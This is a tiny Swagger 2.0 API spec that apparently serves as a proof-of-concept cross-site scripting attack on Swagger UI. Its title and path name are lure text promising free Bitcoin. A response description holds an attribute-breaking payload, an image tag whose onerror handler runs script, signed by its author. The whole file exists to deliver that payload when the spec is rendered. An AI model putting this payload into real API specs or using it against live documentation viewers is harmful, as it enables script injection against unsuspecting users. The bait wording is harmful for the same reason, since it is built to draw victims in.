 
swagger: '2.0'
info:
  title: Get $1000 worth of free Bitcoin
  description: |
    Teste
paths:
  /Free Bitcoin (Click Here):
    get:
      responses:
        '200':
          description: No response was specified'"><img src=x onerror=alert('Swagger-XSS by erickfernandox')>
      tags:
        - Free Bitcoin
      operationId: findAccounts
      summary: Finds all accounts
